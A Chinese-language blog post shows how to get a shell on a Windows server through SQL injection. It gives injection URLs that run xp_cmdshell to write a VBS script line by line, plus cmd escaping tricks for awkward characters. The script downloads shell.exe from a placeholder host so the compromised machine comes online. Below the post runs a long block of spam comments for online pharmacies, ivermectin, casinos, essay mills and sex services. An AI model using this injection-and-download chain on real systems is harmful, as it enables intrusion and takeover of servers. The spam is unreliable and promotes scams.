实战中,会遇到只能用url传递参数拿shell的情况。比如在xp_cmeshell下写入asp/aspx webshell,又或者写入vbs脚本来下载exe使主机上线。
写文件地址:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'echo data >> C:\out.txt';--这里用追加的方式写文件,data是我们要写入的数据。
下载远程文件的vbs代码
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://x.x.x.x/shell.exe"
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
wscript.sleep 3000
aGet.Write(post.responseBody)
aGet.SaveToFile "shell.exe",2在这个脚本中,有这些特殊符号:/=(“),.
经过测试,能够正常写入的有:
/
.
,
()
成对的"
xx=字符开头字符串对于单个的双引号,需要进行转义。Windows cmd下的转义字符是^。写入单引号需要这样转换一下:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'echo ^" >> C:\out.txt';--对于写入aGet.Mode = 3这样的数据,需要分两次写入,而且不能换行:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'set /p="aGet.Mod" >> C:\out.txt';--
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'set /p="e = 3" >> C:\out.txt';--这样两段字符串就写在了一行。
Very good post. Fantastic.
Very good blog article.Really looking forward to read more. Much obliged.
A round of applause for your blog. Awesome.
Hoktjb – 500 word research paper Httnzc qwffcr
Thank you for your article post. Great.
us essay writing services persuasive essay writing help
wow, awesome post.Thanks Again. Cool.
Say, you got a nice article.Really looking forward to read more. Much obliged.
I loved your article post.Really looking forward to read more. Fantastic.
I loved your blog post.Thanks Again. Really Great.
Wow, great article. Cool.
A big thank you for your blog post.Really looking forward to read more. Great.
Very good post.Really looking forward to read more. Will read on…
เดี๋ยวนี้ผู้คนต่างมองหาหนทางการผลิตรายได้ที่ลงทุนน้อย UFABET คาสิโนออนไลน์ได้เก็บทุกเกมออนไลน์ที่ท่านพอใจไม่ว่าจะเป็นบาคาร่า พนันบอล สล็อต ยิงปลา รวมถึงเกมใหม่ๆที่พึ่งพิงเปิดตัวเข้าสู่วงการเกมออนไลน์ UFABET จ่ายจริง จ่ายไว ไม่มีขั้นต่ะ
I really like and appreciate your article.Really looking forward to read more. Keep writing.
Awesome blog post.Really thank you! Awesome.
Jemand im Wesentlichen unterstützen, um ernst Artikel ich würde zu sagen . Dies das allererste Mal, dass ich Ihre Website-Seite besucht habe und so weit? Ich überrascht mit der Forschung, die Sie gemacht haben, um dieses tatsächlich machen posten erstaunlich. Großartig Job!
A round of applause for your blog post.Thanks Again.
Appreciate you sharing, great article.Really thank you! Really Great.
Very informative post.Really looking forward to read more. Fantastic.
Very good article.Really thank you! Will read on…
สล็อตออนไลน์เกมคาสิโนยอดนิยมชั่วกัลปวสาน เล่นง่าย แจ็คพอตแตกไวจำเป็นต้องที่ UFABET จ่ายจริง จ่ายเต็ม มีเกมให้เลือกมากมายทั้งพนันบอล บาคาร่า ยิงปลา มาเว็บไซต์นี้เว็บเดียวบอกเลยจ้าขอรับว่าโคตรคุ้ม สร้างรายได้กล้วยๆจบที่เว็บไซต์ UFABET ได้เลยคะครับผม
Appreciate you sharing, great post.Really looking forward to read more.
Awesome blog post.Really looking forward to read more. Much obliged.
Very good blog.Much thanks again. Really Great.
Super good article. I’ll return to view more. Thank you for creating it.
Thank you for your blog.Thanks Again. Really Cool.
nicee content keep writing
A big thank you for your blog article.Much thanks again. Cool.
Muchos Gracias for your post. Really Cool.
Really informative article. Great.
I really liked your article post. Awesome.
Say, you got a nice post. Really Great.
Really informative blog post.Really looking forward to read more. Cool.
Awesome article post.Really looking forward to read more. Great.
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
ivermectin 12
????? – ??? ?????????? ????????? ?? ??????? ????????, ?? ????? ????. ?????? ????????Loading…
trusted india online pharmacies medication from india – online pharmacy
Wow, great blog.Much thanks again. Really Great.
I couldn’t refrain from commenting. Very well written!
Muchos Gracias for your article.Much thanks again. Fantastic.
I really like and appreciate your article.Really looking forward to read more. Great.
I really like and appreciate your blog post. Great.
I really liked your blog article.Much thanks again.
Just stumble upon your blog from from time to time. nice article
I used to be able to find good info from your blog articles.
Very neat article post.Thanks Again. Really Cool.
Thank you for your post.Thanks Again. Want more.
apartments in longmont co apartments in titusville fl
Very neat article post.Really looking forward to read more. Much obliged.
It’s a comprehensive, yet fast read.
Really informative blog.Really thank you! Much obliged.
Good information. Lucky me I recently found your website by accident (stumbleupon). I have book marked it for later!
I really liked your blog.Really looking forward to read more. Really Great.
generic stromectol stromectol for humans for sale – stromectol otc
ivermectin nz stromectol for sale – ivermectin pills human
Awesome article.Thanks Again.
A big thank you for your blog post.Really thank you! Great.
Muchos Gracias for your article post.Really looking forward to read more. Will read on…
I loved your blog article.Much thanks again. Much obliged.
Thank so much for helping me.
I really admire your writing!
Thanks for sharing.
How can I get more helpful information?
How can I get more useful information?
Great information. Lucky me I ran across your blog by chance (stumbleupon). I’ve bookmarked it for later.
Thanks for sharing.
Very good info thanks so much!
Saved as a favorite, I really like your website.
Thank so much for helping me.
Thank you for your post.Really looking forward to read more. Want more.
Thank you ever so for you article.Much thanks again. Want more.
your won weblog.
Enjoyed every bit of your article.Thanks Again. Great.
Nice blog. Could someone with little experience do it, and add updates without messing it up? Good information on here, very informative.
Great blog. Really Great.
ed medication online best ed medicationsbest ed pills
Very informative blog post.Really thank you! Really Great.
Appreciate you sharing, great blog.Really looking forward to read more. Really Great.
Thank you ever so for you blog article.Much thanks again. Cool.
Great article post. Really Great.
I really like and appreciate your blog post. Fantastic.
Say, you got a nice blog article.Really thank you! Will read on…
I really liked your article.Really looking forward to read more. Keep writing.
Awesome blog article.Really looking forward to read more. Really Cool.
A big thank you for your article.Thanks Again. Keep writing.
Very good blog post.Thanks Again. Keep writing.
Just wanted to say thank you!
Fantastic blog article.Really looking forward to read more. Fantastic.
Just wanted to say thanks!
Thanks so much for your hard work.
A big thank you for your article.Much thanks again. Keep writing.
I really like your writing style, excellent info , thanks for putting up : D.
Just wanted to say thank you!
ivermectin canada ivermectin 5 – ivermectin human
Thank you so much for helping me.
Thank you for your article post.Thanks Again. Great.
Appreciate you sharing, great blog article.Much thanks again. Want more.
Really informative article post.Really looking forward to read more. Will read on…
Very good blog post.Much thanks again. Want more.
A round of applause for your blog.Much thanks again. Cool.
Thanks so much for your hard work.
Thank you for your blog article.Thanks Again. Great.
Great article post.Thanks Again. Great.
Very good info thanks so much!
Say, you got a nice post.Really looking forward to read more. Want more.
Just wanted to say thanx!
Enjoyed every bit of your article post.Thanks Again. Really Cool.
Appreciate you sharing, great blog.Really looking forward to read more. Want more.
Appreciate you sharing, great blog. Fantastic.
modafinil generic modafinil pill modafinil online
Fantastic blog.Thanks Again. Awesome.
Tbufaf – cover letters for employment Jynzxn iijyyx
It’s a comprehensive, yet fast read.
bonjour I love Your Blog can not say I come here often but im liking what i c so far….
Just stumble upon your blog from from time to time. nice article
I loved your blog.Really thank you! Much obliged.
Utterly pent articles , thanks for information .
Very good info thanks so much!
Thanks so much for your hard work.
Thank you for your article.Thanks Again. Great.
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
Very neat blog article.Really thank you! Really Great.
ปัจจุบันนี้ผู้คนต่างมองหาช่องทางการผลิตรายได้ที่ลงทุนน้อย UFABET คาสิโนออนไลน์ได้รวบรวมทุกเกมออนไลน์ที่ท่านพอใจไม่ว่าจะเป็นบาคาร่า พนันบอล สล็อต ยิงปลา รวมทั้งเกมใหม่ๆที่พึ่งพิงเปิดตัวเข้าสู่วงการเกมออนไลน์ UFABET จ่ายจริง จ่ายไว ไม่มีขั้นต่ะ
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
Just wanted to say thanks!
Fantastic blog article.Really looking forward to read more. Fantastic.
Woh I like your content, saved to bookmarks! .
Thank you for your blog post. Awesome.
Great post.Thanks Again. Really Great.
hydroxychloroquine for covid 19 hydroxychloroquine trump
Just wanted to say thanks!
Awesome blog.Thanks Again. Want more.
I loved your article.Much thanks again. Fantastic.
Very neat article post.Really thank you! Really Cool.
I loved your blog article.Thanks Again. Fantastic.
I’ll without delay clutch your rss as I can not find your email subscription hyperlink or publication services. Do you might have any? Kindly let me realize making sure that I could subscribe. Many thanks
I just bookmarked your page.
How can I get more helpful info?
I just saved your site.
How can I get more helpful information?
How can I get more useful information?
How can I get more helpful information?
legit canadian pharmacy online – canadian pharmacy 24 best canadian online pharmacy reviews
ivermectin liquid ivermectin flea control
Thank you very much for helping me.
How can I get more helpful info?
Thank you for sharing.
Wow, great article post.Thanks Again. Really Cool.
Thanks so much for your hard work.
Thank you for sharing.
Thank so much for helping me.
Thanks so much for your hard work.
How can I get more useful info?
UFABET ศูนย์รวมเกมคาสิโนออนไลน์ที่เหมาะสมที่สุดในยุคนี้รวมทั้งบาคาร่า เกมยอดนิยมที่สร้างรายได้ให้ใครๆเยอะมาก UFABET เว็บบาคาร่าออนไลน์ที่จ่ายจริง จ่ายแรง ค้ำประกันด้วยยอดสมาชิกที่มากขึ้นทุกวี่ทุกวัน มาแรงแซงทุกเว็บเลยขอรับ
Interested in more info. How can I contact you?
How can I get more helpful info?
Interested in more info. How can I reach you?
Magnificent beat ! Can I be your apprentice? Just kidding!
nicee content keep writing
Thanks so much for sharing.
Just wanted to say thank you!
Interested in more information. How can I contact you?
Thank you so much for helping me.
I just saved your webpage.
Very good information thanks so much!
Interested in more info. How can I contact you?
Thanks for sharing.
[url=http://xlonlinepharmacy.site/]accutane no prescription pharmacy[/url]
Muchos Gracias for your article.Really thank you! Cool.
Thank so much for helping me.
I really like your writing style, excellent info , thanks for putting up : D.
I loved your post.Really thank you! Keep writing.
Thank you so much for helping me.
bookmarked!!, I like your site!
I really like your writing!
Thanks for your hard work.
Really informative article post.Really looking forward to read more. Want more.
Very informative blog article.Thanks Again. Really Great.
Wow, great post.Really looking forward to read more. Fantastic.
I really like your writing!
Thank you ever so for you blog. Really looking forward to read more.
I could not refrain from commenting. Very well written!
Thanx very much for helping me.
Just wanted to say thanx!
A blog like yours should be earning much money from adsense.’~::-
Thank very much for helping me.
I really like your writing!
Say, you got a nice blog post.Really looking forward to read more. Awesome.
Very good information thanks so much!
Interested in more information. How can I contact you?
I really like your writing!
Thanks so much for sharing.
Can any guy make me cum please?
Really informative blog.Much thanks again. Will read on…
Thank you for sharing.
I really admire your writing!
Howdy! [url=http://edpill.online/]best ed pills online[/url] mens ed pills
I just saved your website.
Interested in more information. How can I reach you?
How can I get more helpful info?
Interested in more info. How can I reach you?
Very good information thanks so much!
I really like your writing!
Thanks for sharing.
หนังการ์ตูนหนังจินตนาการหนังรักโรแมนติก Fantasy ภาพยนตร์ที่มีการผสมจินตนาการแบบที่เราๆ ไม่ค่อยเห็นในชีวิต จะเรียกว่า เหนือจริงก็ได้ เด็กๆ หลายคนชอบจนถึงขั้นติดเลย
Thank you ever so for you blog.Thanks Again. Cool.
tider , tinder loginbrowse tinder for free
legit canadian online pharmacy cyprus online pharmacy – best canadian pharmacy online
Very neat post.Really thank you! Want more.
Thank you ever so for you blog post.Really looking forward to read more. Awesome.
Great blog article. Great.
Appreciate you sharing, great blog post.Much thanks again. Much obliged.
All from one little pill, Extraordinary gives you remarkable energy!
Brain fitness instructor that works in 10 mins a day.
4 סטודנטיות חרמניות עומדות בתור לזין של גבר למצוץ אותה ולקבל זיוןשירותי ליווי בתל אביב
Exactly how? Find out now!
Fantastic blog article.Much thanks again. Cool.
Say, you got a nice blog article.Thanks Again. Keep writing.
A big thank you for your post.Much thanks again. Will read on…
Appreciate you sharing, great blog post.Much thanks again. Awesome.
Awesome article post.Much thanks again. Want more.
A round of applause for your article post.Really looking forward to read more. Will read on…
A round of applause for your blog post.Really thank you! Keep writing.
Muchos Gracias for your blog.Thanks Again. Keep writing.
Very good blog post.Really looking forward to read more. Will read on…
I really liked your blog post.Really thank you!
Our outstanding helps you take initiative with any person or task.
Yes! Finally someone writes about shantung silk fabric.
Enjoyed every bit of your blog. Cool.
wow, awesome article.Much thanks again. Really Cool.
Keep on working, great job!|
I really like and appreciate your article post.Much thanks again. Fantastic.
wow, awesome blog post. Really Cool.
How can I get more useful info?
xnshurdk : [url=https://propeciarw.top/#]buy finasteride pills[/url] hmcwqsz
kydhsmdi : [url=http://xuonlinepharmacy.com/#]canada pharmacy online pharmacy viagra generic[/url] glziqze
ldlttczp : [url=http://ivermectinuu.site/#]ivermectin cost in usa[/url] kzeleyb
svlfizsk : [url=http://erectiledysfunctionpills-365.com/#]best erectile dysfunction drug[/url] fauiiow
Looking forward to reading more. Great post.Really looking forward to read more. Really Cool.
wow, awesome blog post.Much thanks again. Really Great.
Great blog article.Thanks Again. Cool.
Saved as a favorite, I like your website.
Thank you for your blog. Keep writing.
wow, awesome article. Awesome.
Really informative post.Much thanks again. Really Cool.
You’ll be in a haze of clearness, efficiency as well as joy .
It’s that time once again to obtain whatever performed in a really short period of time.
Awesome blog post.Really thank you! Cool.
Appreciate you sharing, great article post.Much thanks again. Great.
Thank you for your article post. Want more.
Great blog.Really thank you! Really Cool.
I value your consideration. I’m impressed by your effort and devotion.